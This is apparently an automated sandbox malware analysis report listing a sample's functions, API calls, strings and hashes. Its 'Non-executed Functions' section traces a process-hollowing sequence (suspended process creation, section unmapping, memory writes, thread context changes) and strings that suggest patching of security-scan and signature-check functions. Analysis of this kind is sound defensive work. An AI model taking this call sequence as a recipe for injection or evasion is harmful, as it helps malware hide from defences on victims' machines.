                                                                                                                              Function 028C9B3C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • timeSetEvent.WINMM(00002710,00000000,028C9B30,00000000,00000001), ref: 028C9B4C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Eventtime
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2982266575-0
                                                                                                                              • Opcode ID: 6b8129308f31ce6b414bc89383520a1168d1f58b3ecaaff39b4989f29b20be0a
                                                                                                                              • Instruction ID: d875befc18e757e4e85076d4fca431c2f038b97bd46e2af30c1553dfb9e09398
                                                                                                                              • Opcode Fuzzy Hash: 6b8129308f31ce6b414bc89383520a1168d1f58b3ecaaff39b4989f29b20be0a
                                                                                                                              • Instruction Fuzzy Hash: F3C09BF97A53107EF51055A41CD1F37154DE704700F600455B704DD2C1DAF1A8104774
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A4BFC Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 028A4C03
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2525500382-0
                                                                                                                              • Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                              • Instruction ID: 14260b8d89de0f68d45207f6da2fb18a1ec7a47d645f9567aa1fae815ce63e8e
                                                                                                                              • Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                              • Instruction Fuzzy Hash: 89B0123C24820528FE6411660E307B2004C4B90389F8810519E1DC84C1FFC5D002883B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A4C14 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 028A4C1B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3341692771-0
                                                                                                                              • Opcode ID: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
                                                                                                                              • Instruction ID: fd91fa55b07adcbc3577f94af20023f3f2314dc50a97d5048b6fa49ed86e7cf2
                                                                                                                              • Opcode Fuzzy Hash: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
                                                                                                                              • Instruction Fuzzy Hash: D0A011AC0002022ABF0A222E002022A2022AEC0302388C8A882088A000AFBA8000A828
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,028A1A03,?,028A1FC1), ref: 028A15E2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: f24d81c1deb63dc907aaa0e6e28fb690562f64ea1fcab37cdcec6daf26d583e8
                                                                                                                              • Instruction ID: 86b275ce84cdb2ab24e566ca185678ebab0fb46da72c73fa5132bb2c65145570
                                                                                                                              • Opcode Fuzzy Hash: f24d81c1deb63dc907aaa0e6e28fb690562f64ea1fcab37cdcec6daf26d583e8
                                                                                                                              • Instruction Fuzzy Hash: 39F049F4F453008FEB06CF7999D83117AD6E789344F14867EDA09DB388EB71A4058B00
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,028A1FC1), ref: 028A16A4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 49112e15963b4e90484d5ddb07a101dcd39da2ba3019c6408a67643f604e4e71
                                                                                                                              • Instruction ID: 5cf3fb0b056f7f6cddc8be1c887b14961740774284767753053164ba50a119b0
                                                                                                                              • Opcode Fuzzy Hash: 49112e15963b4e90484d5ddb07a101dcd39da2ba3019c6408a67643f604e4e71
                                                                                                                              • Instruction Fuzzy Hash: CCF090B6B447996FE7119E5EACC4792BBE4FB45314F050139EA0CDB344D770A8108BD4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 028A1704
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1263568516-0
                                                                                                                              • Opcode ID: 273fbe0c7a0f54742d86c1dbdecd157e50b29b4a9d0ae9a40cc0a4f9e6d49297
                                                                                                                              • Instruction ID: 49e108ab1e3a6d1a5f0b56d686b1ab9f2d64feab0edf4bce79ef02df5abb59a1
                                                                                                                              • Opcode Fuzzy Hash: 273fbe0c7a0f54742d86c1dbdecd157e50b29b4a9d0ae9a40cc0a4f9e6d49297
                                                                                                                              • Instruction Fuzzy Hash: E0E0727D300300AFF7105B7E4D88B12BBDCEB88364F240436F209CB292CBA0E8108B20
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 028B9B94 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028B9E1B,?,?,028B9EAD,00000000,028B9F89), ref: 028B9BA8
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028B9BC0
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028B9BD2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028B9BE4
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028B9BF6
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028B9C08
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028B9C1A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 028B9C2C
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028B9C3E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028B9C50
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028B9C62
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028B9C74
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028B9C86
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 028B9C98
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028B9CAA
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028B9CBC
                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028B9CCE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                              • API String ID: 667068680-597814768
                                                                                                                              • Opcode ID: 54bbf133e3ff7d17c8c09ca93b0eb21640b3b2ebb52d0987ef4a6967de989f6c
                                                                                                                              • Instruction ID: 35144ea8255026396dfe0cf59032a273f3096793e785f3c96ad3a1b26665c7d7
                                                                                                                              • Opcode Fuzzy Hash: 54bbf133e3ff7d17c8c09ca93b0eb21640b3b2ebb52d0987ef4a6967de989f6c
                                                                                                                              • Instruction Fuzzy Hash: 1D31107CA456289FFF019F6DD8D5AA933A9BF02301F891959E119DF309E778A800CF12
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B7F48 Relevance: 41.9, APIs: 8, Strings: 15, Instructions: 1602nativethreadprocessCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02905398,02905388,OpenSession,02905360,028B9A30,ScanString,02905360), ref: 028B8446
                                                                                                                              • GetThreadContext.KERNEL32(00000000,029053DC,ScanString,02905360,028B9A30,UacInitialize,02905360,028B9A30,ScanBuffer,02905360,028B9A30,ScanBuffer,02905360,028B9A30,UacInitialize,02905360), ref: 028B87DF
                                                                                                                              • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,029054B0,00000004,029054B8,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360), ref: 028B8A3C
                                                                                                                              • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,00000000,-00000008,029054B0,00000004,029054B8), ref: 028B8BB7
                                                                                                                                • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                                • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                                • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029054B8,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,ScanBuffer,02905360), ref: 028B920B
                                                                                                                              • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,029054B4,00000004,029054B8,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,00000000,00000000), ref: 028B937E
                                                                                                                              • SetThreadContext.KERNEL32(00000000,029053DC,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,00000000,-00000008,029054B4,00000004,029054B8), ref: 028B94F4
                                                                                                                              • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,029053DC,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,00000000,-00000008,029054B4), ref: 028B9501
                                                                                                                                • Part of subcall function 028B7AC0: LoadLibraryW.KERNEL32(bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize,02905360,028B9A30,00000000,029053DC,ScanString,02905360,028B9A30), ref: 028B7AD2
                                                                                                                                • Part of subcall function 028B7AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028B7ADF
                                                                                                                                • Part of subcall function 028B7AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize), ref: 028B7AF6
                                                                                                                                • Part of subcall function 028B7AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360,028B9A30,UacInitialize,02905360,028B9A30,00000000,029053DC), ref: 028B7B05
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                              • API String ID: 2533507481-2367850715
                                                                                                                              • Opcode ID: 23f597b360f2d4d5e08d9f9bface122fcff1e7ccd83d642db23fa7549d50b379
                                                                                                                              • Instruction ID: fe7fbf3b24c0e764e930d2f4f3a8c2d26aa57481fca2cb61a56ececc688fe4d0
                                                                                                                              • Opcode Fuzzy Hash: 23f597b360f2d4d5e08d9f9bface122fcff1e7ccd83d642db23fa7549d50b379
                                                                                                                              • Instruction Fuzzy Hash: CCE21D3DA402688FEF11EB68D890ADEB3B6AF46701F1084A5D109F7315DEB0AE55CF52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B7F46 Relevance: 41.8, APIs: 8, Strings: 15, Instructions: 1553nativeprocessthreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02905398,02905388,OpenSession,02905360,028B9A30,ScanString,02905360), ref: 028B8446
                                                                                                                              • GetThreadContext.KERNEL32(00000000,029053DC,ScanString,02905360,028B9A30,UacInitialize,02905360,028B9A30,ScanBuffer,02905360,028B9A30,ScanBuffer,02905360,028B9A30,UacInitialize,02905360), ref: 028B87DF
                                                                                                                              • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,029054B0,00000004,029054B8,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,UacScan,02905360), ref: 028B8A3C
                                                                                                                              • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02905360,028B9A30,ScanString,02905360,028B9A30,Initialize,02905360,028B9A30,00000000,-00000008,029054B0,00000004,029054B8), ref: 028B8BB7
                                                                                                                                • Part of subcall function 028B7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                                • Part of subcall function 028B7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                                • Part of subcall function 028B7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                              • API String ID: 3979268988-2367850715
                                                                                                                              • Opcode ID: b8ccc4dc5082f60e5546dba87ccb0e0556dbf13ee0a2d0a925f5e76bbba4c162
                                                                                                                              • Instruction ID: 1eaeb5bdd71886e64a803d18461de26f13b23c9e66304da19311fa006a356726
                                                                                                                              • Opcode Fuzzy Hash: b8ccc4dc5082f60e5546dba87ccb0e0556dbf13ee0a2d0a925f5e76bbba4c162
                                                                                                                              • Instruction Fuzzy Hash: 6BE22D3DA402688FEF11EB68D890ADEB3B6AF46701F1084A5D109F7315DEB0AE55CF52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A58CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A58E9
                                                                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028A5900
                                                                                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 028A5930
                                                                                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A5994
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A59CA
                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A59DD
                                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A59EF
                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028A6BD0,028A0000,028CB790), ref: 028A59FB
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028A6BD0,028A0000), ref: 028A5A2F
                                                                                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028A6BD0), ref: 028A5A3B
                                                                                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 028A5A5D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                              • API String ID: 3245196872-1565342463
                                                                                                                              • Opcode ID: 69a1836db758774e4f97431ab114cf3734f5496221e9299cd39ca520bb01773f
                                                                                                                              • Instruction ID: bce8ea04137743adcd3e6d46a0fc83cf55aae3e7e74b14f1ff5a948e99aa78e3
                                                                                                                              • Opcode Fuzzy Hash: 69a1836db758774e4f97431ab114cf3734f5496221e9299cd39ca520bb01773f
                                                                                                                              • Instruction Fuzzy Hash: C741847DE00618AFEB10DAE8CC98ADEB7BDAF08354F4845A5A549D7241EB34DB848F50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A5B9C Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028A5BAC
                                                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028A5BB9
                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028A5BBF
                                                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028A5BEA
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028A5C31
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028A5C41
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028A5C69
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028A5C79
                                                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028A5C9F
                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028A5CAF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                              • API String ID: 1599918012-2375825460
                                                                                                                              • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                              • Instruction ID: 8d18b352065a0e8a42673f0ac409c46cc9551ed3099c871176fe71d951fc292c
                                                                                                                              • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                              • Instruction Fuzzy Hash: E33184BDE4011C2AFB25D6B8DC59BDEB6AD4B04380F4401A1D648E6185EF78DFC48F51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B79FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22librarynativeloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 028B7A09
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B7A0F
                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 028B7A2D
                                                                                                                              Strings
                                                                                                                              • NtProtectVirtualMemory, xrefs: 028B79FF
                                                                                                                              • C:\Windows\System32\ntdll.dll, xrefs: 028B7A04
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
